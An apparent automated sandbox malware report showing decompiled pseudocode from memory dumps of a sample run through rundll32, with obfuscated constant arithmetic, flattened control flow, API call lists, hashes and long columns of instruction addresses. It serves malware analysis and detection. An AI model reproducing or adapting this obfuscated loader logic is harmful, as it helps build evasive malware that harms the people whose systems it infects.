				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
				_v352 = 0x4c1d4a;
				_v352 = _v352 >> 0xd;
				_v352 = _v352 * 0xe;
				_v352 = _v352 ^ 0x0003e302;
				_v388 = 0x7e89b7;
				_v388 = _v388 / _t419;
				_t420 = 0x48;
				_v388 = _v388 / _t420;
				_t421 = 0x2b;
				_t414 = _v368;
				_v388 = _v388 / _t421;
				_v388 = _v388 ^ 0x000ed69e;
				_t422 = _v368;
				_v300 = 0xe9da01;
				_v300 = _v300 + 0xffffd878;
				_v300 = _v300 ^ 0x00eb5be0;
				_v336 = 0x6aaf6d;
				_v336 = _v336 * 0x22;
				_v336 = _v336 ^ 0x0e2b42a4;
				_v316 = 0x54d710;
				_v316 = _v316 >> 0xc;
				_v316 = _v316 ^ 0x0000014d;
				while(1) {
					L1:
					_t332 = 0x61250f6;
					do {
						while(1) {
							L2:
							_t427 = _t367 - _t332;
							if(_t427 > 0) {
								break;
							}
							if(_t427 == 0) {
								_t352 = E002E0AE0(0x40, 1);
								_push(_v320);
								_push( &_v260);
								_push(_t352);
								_push(0xb);
								E002D80E3(_v364, _v304);
								_t425 =  &(_t425[6]);
								_t367 = 0x97954ea;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x2db8754) {
								E002E8519(_v360, _v348, _v292);
								E002E8519(_v352, _v388, _t422);
								E002E8519(_v300, _v336, _v284);
								_t367 = _t414;
								L33:
								_t332 = 0x61250f6;
								goto L34;
							}
							if(_t367 == 0x349a1a2) {
								_t422 = 0;
								E002D4B61( &_v260, 0x100, _v376, _v344);
								_v284 = _v284 & 0;
								_v280 = _v280 & 0;
								_v292 = _v292 & 0;
								_v288 = _v288 & 0;
								_t367 = 0xea9523f;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
							if(_t367 == 0x47b49b8) {
								if(_v288 >= _v316) {
									_t359 = E002EF435( &_v292,  &_v284);
								} else {
									_t359 = E002EA666( &_v292);
								}
								_t422 = _t359;
								_t332 = 0x61250f6;
								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
								continue;
							}
							if(_t367 != 0x54d1846) {
								goto L34;
							}
							_t386 =  *0x2f3e08; // 0x0
							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
							_t413 =  *((intOrPtr*)(_t386 + 0x14));
							 *((intOrPtr*)(_t386 + 4)) = _t361;
							if(_t361 == 0) {
								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
							}
							_t362 =  *0x2f3e08; // 0x0
							if(_t413 >=  *_t362) {
								_t387 =  *0x2f3e08; // 0x0
								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
								L37:
								return _t364;
							} else {
								_t367 = 0x349a1a2;
								while(1) {
									L1:
									_t332 = 0x61250f6;
									goto L2;
								}
							}
						}
						if(_t367 == 0x70f4b52) {
							E002E8519(_v372, _v380, _v276);
							_t367 = 0x2db8754;
							goto L33;
						}
						if(_t367 == 0x97954ea) {
							_t335 =  *0x2f3e08; // 0x0
							_t338 =  *0x2f3e08; // 0x0
							_t343 =  *0x2f3e08; // 0x0
							_t345 = E002EE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
							_t425 =  &(_t425[0xb]);
							if(_t345 == 0) {
								_t414 = 0x54d1846;
								_t367 = 0x2db8754;
							} else {
								_t367 = 0xcdb2e90;
							}
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 == 0xcdb2e90) {
							_t347 = E002D5548(_v324, _a24, _v332, _v340,  &_v276);
							_t425 =  &(_t425[4]);
							if(_t347 == 0) {
								_t414 = 0x54d1846;
							} else {
								_t414 = 0xa80516a;
								_t364 = 1;
							}
							_t367 = 0x70f4b52;
							while(1) {
								L1:
								_t332 = 0x61250f6;
								goto L2;
							}
						}
						if(_t367 != 0xea9523f) {
							goto L34;
						}
						_t349 = E002DCF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
						_t425 =  &(_t425[5]);
						if(_t349 == 0) {
							goto L37;
						}
						_t367 = 0x47b49b8;
						goto L1;
						L34:
					} while (_t367 != 0xa80516a);
					goto L37;
				}
			}






































































                                                                                                                                  0x002d64ec
                                                                                                                                  0x002d64f3
                                                                                                                                  0x002d64f5
                                                                                                                                  0x002d64fc
                                                                                                                                  0x002d6503
                                                                                                                                  0x002d650a
                                                                                                                                  0x002d6511
                                                                                                                                  0x002d6518
                                                                                                                                  0x002d6519
                                                                                                                                  0x002d651a
                                                                                                                                  0x002d651f
                                                                                                                                  0x002d6527
                                                                                                                                  0x002d652a
                                                                                                                                  0x002d6537
                                                                                                                                  0x002d653f
                                                                                                                                  0x002d6541
                                                                                                                                  0x002d6549
                                                                                                                                  0x002d654e
                                                                                                                                  0x002d6556
                                                                                                                                  0x002d655e
                                                                                                                                  0x002d6566
                                                                                                                                  0x002d6574
                                                                                                                                  0x002d6579
                                                                                                                                  0x002d657f
                                                                                                                                  0x002d6587
                                                                                                                                  0x002d6592
                                                                                                                                  0x002d659a
                                                                                                                                  0x002d65a5
                                                                                                                                  0x002d65b2
                                                                                                                                  0x002d65b5
                                                                                                                                  0x002d65b9
                                                                                                                                  0x002d65c1
                                                                                                                                  0x002d65c9
                                                                                                                                  0x002d65d1
                                                                                                                                  0x002d65d9
                                                                                                                                  0x002d65e1
                                                                                                                                  0x002d65e6
                                                                                                                                  0x002d65ee
                                                                                                                                  0x002d65f6
                                                                                                                                  0x002d65fe
                                                                                                                                  0x002d6606
                                                                                                                                  0x002d660e
                                                                                                                                  0x002d6616
                                                                                                                                  0x002d661e
                                                                                                                                  0x002d6626
                                                                                                                                  0x002d6636
                                                                                                                                  0x002d663a
                                                                                                                                  0x002d6642
                                                                                                                                  0x002d664a
                                                                                                                                  0x002d6652
                                                                                                                                  0x002d665a
                                                                                                                                  0x002d6662
                                                                                                                                  0x002d6674
                                                                                                                                  0x002d6677
                                                                                                                                  0x002d667b
                                                                                                                                  0x002d6683
                                                                                                                                  0x002d668b
                                                                                                                                  0x002d6690
                                                                                                                                  0x002d6698
                                                                                                                                  0x002d66a0
                                                                                                                                  0x002d66a8
                                                                                                                                  0x002d66b0
                                                                                                                                  0x002d66b8
                                                                                                                                  0x002d66c0
                                                                                                                                  0x002d66c8
                                                                                                                                  0x002d66d2
                                                                                                                                  0x002d66da
                                                                                                                                  0x002d66e2
                                                                                                                                  0x002d66ea
                                                                                                                                  0x002d66ef
                                                                                                                                  0x002d66f4
                                                                                                                                  0x002d66fc
                                                                                                                                  0x002d6704
                                                                                                                                  0x002d6712
                                                                                                                                  0x002d6717
                                                                                                                                  0x002d671d
                                                                                                                                  0x002d6722
                                                                                                                                  0x002d672a
                                                                                                                                  0x002d6732
                                                                                                                                  0x002d673a
                                                                                                                                  0x002d6742
                                                                                                                                  0x002d674a
                                                                                                                                  0x002d6757
                                                                                                                                  0x002d675a
                                                                                                                                  0x002d675e
                                                                                                                                  0x002d6766
                                                                                                                                  0x002d676e
                                                                                                                                  0x002d6776
                                                                                                                                  0x002d6783
                                                                                                                                  0x002d6787
                                                                                                                                  0x002d678f
                                                                                                                                  0x002d6797
                                                                                                                                  0x002d679f
                                                                                                                                  0x002d67a7
                                                                                                                                  0x002d67af
                                                                                                                                  0x002d67b7
                                                                                                                                  0x002d67bf
                                                                                                                                  0x002d67c7
                                                                                                                                  0x002d67cf
                                                                                                                                  0x002d67d7
                                                                                                                                  0x002d67df
                                                                                                                                  0x002d67e7
                                                                                                                                  0x002d67ef
                                                                                                                                  0x002d67f7
                                                                                                                                  0x002d67ff
                                                                                                                                  0x002d6804
                                                                                                                                  0x002d680c
                                                                                                                                  0x002d6814
                                                                                                                                  0x002d681c
                                                                                                                                  0x002d6824
                                                                                                                                  0x002d6829
                                                                                                                                  0x002d6831
                                                                                                                                  0x002d6839
                                                                                                                                  0x002d6841
                                                                                                                                  0x002d6846
                                                                                                                                  0x002d684e
                                                                                                                                  0x002d6856
                                                                                                                                  0x002d685e
                                                                                                                                  0x002d6863
                                                                                                                                  0x002d686b
                                                                                                                                  0x002d6873
                                                                                                                                  0x002d687d
                                                                                                                                  0x002d6881
                                                                                                                                  0x002d6889
                                                                                                                                  0x002d6899
                                                                                                                                  0x002d68a1
                                                                                                                                  0x002d68a6
                                                                                                                                  0x002d68b0
                                                                                                                                  0x002d68b3
                                                                                                                                  0x002d68b7
                                                                                                                                  0x002d68bb
                                                                                                                                  0x002d68c3
                                                                                                                                  0x002d68c7
                                                                                                                                  0x002d68d2
                                                                                                                                  0x002d68dd
                                                                                                                                  0x002d68e8
                                                                                                                                  0x002d68f5
                                                                                                                                  0x002d68f9
                                                                                                                                  0x002d6901
                                                                                                                                  0x002d6909
                                                                                                                                  0x002d690e
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691b
                                                                                                                                  0x002d691d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6923
                                                                                                                                  0x002d6a56
                                                                                                                                  0x002d6a5b
                                                                                                                                  0x002d6a6d
                                                                                                                                  0x002d6a72
                                                                                                                                  0x002d6a73
                                                                                                                                  0x002d6a75
                                                                                                                                  0x002d6a7a
                                                                                                                                  0x002d6a7d
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d692f
                                                                                                                                  0x002d6a16
                                                                                                                                  0x002d6a25
                                                                                                                                  0x002d6a3d
                                                                                                                                  0x002d6a43
                                                                                                                                  0x002d6bc8
                                                                                                                                  0x002d6bc8
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6bc8
                                                                                                                                  0x002d693b
                                                                                                                                  0x002d69d8
                                                                                                                                  0x002d69da
                                                                                                                                  0x002d69df
                                                                                                                                  0x002d69e6
                                                                                                                                  0x002d69ed
                                                                                                                                  0x002d69f4
                                                                                                                                  0x002d69fd
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6947
                                                                                                                                  0x002d6999
                                                                                                                                  0x002d69a9
                                                                                                                                  0x002d699b
                                                                                                                                  0x002d699b
                                                                                                                                  0x002d699b
                                                                                                                                  0x002d69ae
                                                                                                                                  0x002d69b7
                                                                                                                                  0x002d69bc
                                                                                                                                  0x00000000
                                                                                                                                  0x002d69bc
                                                                                                                                  0x002d694f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6955
                                                                                                                                  0x002d695e
                                                                                                                                  0x002d6960
                                                                                                                                  0x002d6963
                                                                                                                                  0x002d6966
                                                                                                                                  0x002d696b
                                                                                                                                  0x002d6970
                                                                                                                                  0x002d6970
                                                                                                                                  0x002d6973
                                                                                                                                  0x002d697a
                                                                                                                                  0x002d6bdb
                                                                                                                                  0x002d6be1
                                                                                                                                  0x002d6be8
                                                                                                                                  0x002d6bf1
                                                                                                                                  0x002d6980
                                                                                                                                  0x002d6980
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d697a
                                                                                                                                  0x002d6a8d
                                                                                                                                  0x002d6bbd
                                                                                                                                  0x002d6bc3
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6bc3
                                                                                                                                  0x002d6a99
                                                                                                                                  0x002d6b34
                                                                                                                                  0x002d6b4c
                                                                                                                                  0x002d6b7d
                                                                                                                                  0x002d6b89
                                                                                                                                  0x002d6b8e
                                                                                                                                  0x002d6b93
                                                                                                                                  0x002d6b9f
                                                                                                                                  0x002d6ba4
                                                                                                                                  0x002d6b95
                                                                                                                                  0x002d6b95
                                                                                                                                  0x002d6b95
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6aa5
                                                                                                                                  0x002d6b0f
                                                                                                                                  0x002d6b14
                                                                                                                                  0x002d6b19
                                                                                                                                  0x002d6b25
                                                                                                                                  0x002d6b1b
                                                                                                                                  0x002d6b1d
                                                                                                                                  0x002d6b22
                                                                                                                                  0x002d6b22
                                                                                                                                  0x002d6b2a
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6916
                                                                                                                                  0x002d6aad
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6ad6
                                                                                                                                  0x002d6adb
                                                                                                                                  0x002d6ae0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6ae6
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6bcd
                                                                                                                                  0x002d6bcd
                                                                                                                                  0x00000000
                                                                                                                                  0x002d6bd9

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                                  • API String ID: 0-2895984816
                                                                                                                                  • Opcode ID: ab303b1b3978824b086fbcacef8e9d1efe84ba17c7e6d186dbb280baab174200
                                                                                                                                  • Instruction ID: 6bb209c383560c7e07e1998b2899ad2a46c7bbaa0f8bf0d22a15bd4163df25a5
                                                                                                                                  • Opcode Fuzzy Hash: ab303b1b3978824b086fbcacef8e9d1efe84ba17c7e6d186dbb280baab174200
                                                                                                                                  • Instruction Fuzzy Hash: EB0244B25183819FC3A4CF65D589A5BBBE1FF84358F20890EF5DA86260C7B4C959CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 10021854 Relevance: 12.1, APIs: 8, Instructions: 129filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                                  • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                                    • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                  • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                                  • CharUpperA.USER32 ref: 10021943
                                                                                                                                  • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3249967234-0
                                                                                                                                  • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                  • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                                  • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                  • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002D5E60 Relevance: 11.6, Strings: 9, Instructions: 323COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D5E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				void* _t339;
				intOrPtr _t372;
				void* _t374;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t384;
				intOrPtr* _t385;
				void* _t387;
				intOrPtr _t421;
				intOrPtr* _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t434;
				signed int* _t437;

				_t385 = _a8;
				_push(_t385);
				_push(_a4);
				_t423 = __ecx;
				_push(__edx);
				_push(__ecx);
				E002E20B9(_t339);
				_v12 = 0xbcdf6a;
				_t437 =  &(( &_v148)[4]);
				_t421 = 0;
				_v8 = 0;
				_t387 = 0xc04f77e;
				_v92 = 0x11f6ef;
				_v92 = _v92 + 0xffffb184;
				_t424 = 0x71;
				_v92 = _v92 / _t424;
				_t425 = 0x24;
				_v92 = _v92 / _t425;
				_v92 = _v92 ^ 0x0000011d;
				_v56 = 0xfaa796;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x003ea801;
				_v36 = 0x1650e4;
				_v36 = _v36 + 0xce7;
				_v36 = _v36 ^ 0x00165dcb;
				_v116 = 0x54bb44;
				_v116 = _v116 + 0xffff1cdd;
				_v116 = _v116 + 0xffffa99d;
				_v116 = _v116 + 0xa8e5;
				_v116 = _v116 ^ 0x00542aa3;
				_v148 = 0xce1ee6;
				_v148 = _v148 ^ 0xff8bbe67;
				_v148 = _v148 | 0x521cb43f;
				_v148 = _v148 << 1;
				_v148 = _v148 ^ 0xfebb697e;
				_v52 = 0xc2bf1c;
				_v52 = _v52 << 0xc;
				_t426 = 0x73;
				_v52 = _v52 / _t426;
				_v52 = _v52 ^ 0x0061d2eb;
				_v88 = 0x8d6fba;
				_v88 = _v88 * 0x6a;
				_v88 = _v88 * 0x21;
				_v88 = _v88 >> 0xb;
				_v88 = _v88 ^ 0x00119314;
				_v48 = 0xec8dbc;
				_v48 = _v48 + 0xffff0a61;
				_v48 = _v48 | 0x0a9d8147;
				_v48 = _v48 ^ 0x0affcc17;
				_v24 = 0xd16d2c;
				_v24 = _v24 >> 2;
				_v24 = _v24 ^ 0x003dd5e6;
				_v124 = 0xaffa28;
				_v124 = _v124 >> 9;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x3775f33c;
				_v124 = _v124 ^ 0x377a4e54;
				_v76 = 0x9eb952;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 << 0xa;
				_v76 = _v76 ^ 0x00160abd;
				_v108 = 0x8bec79;
				_t427 = 0x28;
				_v108 = _v108 * 0x30;
				_v108 = _v108 + 0xffff86d5;
				_v108 = _v108 + 0xffff5405;
				_v108 = _v108 ^ 0x1a3a719b;
				_v132 = 0x74267e;
				_v132 = _v132 + 0x1b76;
				_v132 = _v132 << 4;
				_v132 = _v132 + 0xffff1414;
				_v132 = _v132 ^ 0x074c11a2;
				_v100 = 0x4236e1;
				_v100 = _v100 ^ 0x96e608d5;
				_v100 = _v100 / _t427;
				_t428 = 0x2d;
				_v100 = _v100 * 0x6c;
				_v100 = _v100 ^ 0x96bd808a;
				_v84 = 0xb83730;
				_v84 = _v84 + 0xffffd15d;
				_v84 = _v84 >> 0xb;
				_v84 = _v84 ^ 0x0009ec33;
				_v140 = 0x532b06;
				_v140 = _v140 ^ 0xb0124270;
				_v140 = _v140 << 1;
				_v140 = _v140 / _t428;
				_v140 = _v140 ^ 0x02279f8d;
				_v44 = 0x33dfa;
				_v44 = _v44 + 0x1c37;
				_v44 = _v44 ^ 0x000817ba;
				_v136 = 0x1bf887;
				_v136 = _v136 ^ 0x189cf430;
				_v136 = _v136 + 0xffff0896;
				_v136 = _v136 ^ 0xf213b32f;
				_v136 = _v136 ^ 0xea9313b1;
				_v144 = 0xffa314;
				_v144 = _v144 >> 7;
				_v144 = _v144 ^ 0x35f9e2de;
				_t429 = 0x1f;
				_v144 = _v144 * 0x5b;
				_v144 = _v144 ^ 0x2f3e99d8;
				_v68 = 0x41f910;
				_v68 = _v68 / _t429;
				_v68 = _v68 ^ 0x28681de5;
				_v68 = _v68 ^ 0x2865ac71;
				_v96 = 0x6e33;
				_v96 = _v96 << 4;
				_v96 = _v96 ^ 0xe7b8475a;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0xcf7b3a2b;
				_v104 = 0xedfca3;
				_t430 = 0x5e;
				_v104 = _v104 * 0x5f;
				_v104 = _v104 | 0x0b07679d;
				_v104 = _v104 ^ 0xc050dc4c;
				_v104 = _v104 ^ 0x9b058770;
				_v112 = 0xe25509;
				_v112 = _v112 ^ 0xf6d0fdca;
				_v112 = _v112 / _t430;
				_v112 = _v112 ^ 0x02984cdf;
				_v40 = 0xf7137d;
				_v40 = _v40 << 8;
				_v40 = _v40 ^ 0xf71f8dee;
				_v64 = 0x5508e8;
				_v64 = _v64 << 4;
				_v64 = _v64 | 0x94c676b5;
				_v64 = _v64 ^ 0x95dffb87;
				_v120 = 0xc732ae;
				_t431 = 0x75;
				_v120 = _v120 / _t431;
				_v120 = _v120 << 7;
				_t432 = 0x2c;
				_v120 = _v120 / _t432;
				_v120 = _v120 ^ 0x000601dd;
				_v72 = 0x179b9;
				_v72 = _v72 >> 1;
				_v72 = _v72 << 0xb;
				_v72 = _v72 ^ 0x05ec7a60;
				_v28 = 0x46261b;
				_t433 = 0x35;
				_v28 = _v28 / _t433;
				_v28 = _v28 ^ 0x000e773f;
				_v128 = 0xfd046c;
				_v128 = _v128 << 1;
				_v128 = _v128 << 3;
				_v128 = _v128 + 0xffff42a9;
				_v128 = _v128 ^ 0x0fc89804;
				_v60 = 0xb39cb2;
				_v60 = _v60 + 0xffffa360;
				_v60 = _v60 ^ 0x6e5a7866;
				_v60 = _v60 ^ 0x6eef17c9;
				_v32 = 0xb015d5;
				_t434 = 0x33;
				_v32 = _v32 / _t434;
				_v32 = _v32 ^ 0x00082471;
				_v80 = 0x87b3ae;
				_v80 = _v80 + 0xffffe530;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x021b575c;
				while(_t387 != 0x5e373ec) {
					if(_t387 == 0x87b20b3) {
						_t372 =  *0x2f3dfc; // 0x0
						_t374 = E002DCA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
						_t437 =  &(_t437[0x12]);
						if(_t374 == _v88) {
							 *_t385 = _v20;
							_t421 = 1;
							 *((intOrPtr*)(_t385 + 4)) = _v16;
						} else {
							_t387 = 0x5e373ec;
							continue;
						}
					} else {
						if(_t387 == 0xc04f77e) {
							_t387 = 0xd382560;
							continue;
						} else {
							if(_t387 == 0xc68a5f7) {
								_push(_t387);
								_push(_t387);
								_t381 = E002D7FF2(_v16);
								_v20 = _t381;
								if(_t381 != 0) {
									_t387 = 0x87b20b3;
									continue;
								}
							} else {
								if(_t387 != 0xd382560) {
									L14:
									if(_t387 != 0x4d23f0b) {
										continue;
									} else {
									}
								} else {
									_t382 =  *0x2f3dfc; // 0x0
									_t384 = E002DCA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
									_t437 =  &(_t437[0x12]);
									if(_t384 == _v148) {
										_t387 = 0xc68a5f7;
										continue;
									}
								}
							}
						}
					}
					return _t421;
				}
				E002E8519(_v32, _v80, _v20);
				_t387 = 0x4d23f0b;
				goto L14;
			}





























































                                                                                                                                  0x002d5e67
                                                                                                                                  0x002d5e71
                                                                                                                                  0x002d5e72
                                                                                                                                  0x002d5e79
                                                                                                                                  0x002d5e7b
                                                                                                                                  0x002d5e7c
                                                                                                                                  0x002d5e7d
                                                                                                                                  0x002d5e82
                                                                                                                                  0x002d5e8d
                                                                                                                                  0x002d5e90
                                                                                                                                  0x002d5e94
                                                                                                                                  0x002d5e9b
                                                                                                                                  0x002d5ea0
                                                                                                                                  0x002d5ea8
                                                                                                                                  0x002d5eb6
                                                                                                                                  0x002d5ebb
                                                                                                                                  0x002d5ec5
                                                                                                                                  0x002d5eca
                                                                                                                                  0x002d5ed0
                                                                                                                                  0x002d5ed8
                                                                                                                                  0x002d5ee0
                                                                                                                                  0x002d5ee5
                                                                                                                                  0x002d5eea
                                                                                                                                  0x002d5ef2
                                                                                                                                  0x002d5efd
                                                                                                                                  0x002d5f08
                                                                                                                                  0x002d5f13
                                                                                                                                  0x002d5f1b
                                                                                                                                  0x002d5f23
                                                                                                                                  0x002d5f2b
                                                                                                                                  0x002d5f33
                                                                                                                                  0x002d5f3b
                                                                                                                                  0x002d5f43
                                                                                                                                  0x002d5f4b
                                                                                                                                  0x002d5f53
                                                                                                                                  0x002d5f57
                                                                                                                                  0x002d5f5f
                                                                                                                                  0x002d5f67
                                                                                                                                  0x002d5f70
                                                                                                                                  0x002d5f73
                                                                                                                                  0x002d5f77
                                                                                                                                  0x002d5f7f
                                                                                                                                  0x002d5f8c
